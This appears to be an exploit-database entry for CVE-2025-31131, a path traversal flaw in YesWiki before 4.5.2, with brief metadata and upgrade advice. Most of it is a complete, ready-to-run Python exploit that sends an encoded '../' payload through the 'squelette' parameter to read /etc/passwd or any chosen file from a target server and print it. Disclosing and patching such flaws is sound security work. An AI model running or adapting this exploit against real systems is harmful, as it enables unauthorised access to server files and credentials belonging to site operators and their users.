YesWiki Unauthenticated Path Traversal

vendor:

YesWiki

by:

Al Baradi Joy

7.1

CVSS

HIGH

Unauthenticated Path Traversal (LFI)

CWE

Product Name: YesWiki

Affected Version From: < 4.5.2

Affected Version To: 4.5.2001

Patch Exists: YES

Related CWE: CVE-2025-31131

CPE: a:yeswiki_project:yeswiki:4.5.1

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2025

YesWiki Unauthenticated Path Traversal

YesWiki before 4.5.2 allows unauthenticated path traversal via the 'squelette' parameter. An attacker can exploit this to read arbitrary files on the server, like /etc/passwd.

Mitigation:

Upgrade to version 4.5.2 or higher to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
#   YesWiki before version 4.5.2 is vulnerable to unauthenticated path
traversal via the 'squelette' parameter.
#   A remote attacker can exploit this issue to read arbitrary files on the
server, such as /etc/passwd.

import requests
import sys

def banner():
    print("=" * 80)
    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
(CVE-2025-31131)")
    print(" Exploit Author: Al Baradi Joy")
    print("=" * 80)

def exploit(target, filename="/etc/passwd"):
    if not target.startswith("http"):
        target = "http://" + target

    traversal = "../" * 8
    encoded_file = filename.replace("/", "%2f")
    payload =
f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
    url = target.rstrip("/") + payload

    try:
        print(f"[+] Target: {target}")
        print(f"[+] Attempting to read: {filename}")
        response = requests.get(url, timeout=10)

        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful. File contents:\n")
            print(response.text)
        else:
            print("[!] Exploit failed or file not readable.")
            print(f"Status Code: {response.status_code}")
            if len(response.text) < 200:
                print(f"Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
        print(f"Example: python3 {sys.argv[0]} http://victim.com
/etc/passwd")
        sys.exit(1)

    target_url = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    exploit(target_url, file_to_read)